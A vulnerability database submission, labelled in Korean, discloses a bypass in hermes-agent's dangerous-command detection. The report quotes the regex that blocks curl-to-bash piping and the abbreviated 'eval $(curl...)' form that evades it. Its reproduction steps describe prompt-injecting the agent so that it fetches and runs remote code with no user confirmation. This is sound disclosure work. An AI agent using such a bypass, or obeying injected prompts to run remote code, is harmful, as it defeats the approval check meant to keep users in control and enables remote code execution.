| 제목 | NousResearch hermes-agent 5157f5427f19488b31c6fdebbacd15d798ce7f63 OS Command Injection (CWE-78) |
|---|
| 설명 | # Technical Details
A Terminal Tool Command Detection bypass exists in the `detect_dangerous_command` pattern matching checking in `tools/approval.py` of hermes-agent.
The application fails to semantically comprehend alternate UNIX execution routines, maintaining purely syntactical feature verification. It blocks `curl xxx | bash` but fails to block semantic equivalents like `eval $(curl...)`.
# Vulnerable Code
File: tools/approval.py
Method: detect_dangerous_command (Regex Patterns)
Why: The `DANGEROUS_PATTERNS` regex list explicitly targets piping content to execution `(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b')`. Wrapping remote downloads in command substitutions dispatched through `eval` subverts the syntactic pattern analysis without altering semantic execution, thereby evading the interactive confirmation prompt flow.
# Reproduction
1. Prompt the Agent into using the `terminal_tool` executing an alternate command style: e.g., `eval $(curl...)`.
2. The regex verification engine attempts matching the input command and returns safe natively.
3. The execution is handed to `bash` without prompting user confirmation interfaces.
4. The shell interprets `eval` and silently executes the remote text.
# Impact
- Remote Code Execution (RCE) via prompt injection.
- Total neutralization of the agent's built-in sandbox and prompt approval mechanisms, functioning effectively as silent zero-click payload execution. |
|---|
| 원천 | ⚠️ https://gist.github.com/YLChen-007/75fb10319693e86106ced2ef3a472c80 |
|---|
| 사용자 | Eric-i (UID 97584) |
|---|
| 제출 | 2026. 04. 24. PM 03:01 (1 월 ago) |
|---|
| 모더레이션 | 2026. 05. 23. PM 12:33 (29 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 365330 [NousResearch hermes-agent 까지 5157f5427f19488b31c6fdebbacd15d798ce7f63 terminal_tool tools/approval.py detect_dangerous_command 권한 상승] |
|---|
| 포인트들 | 20 |
|---|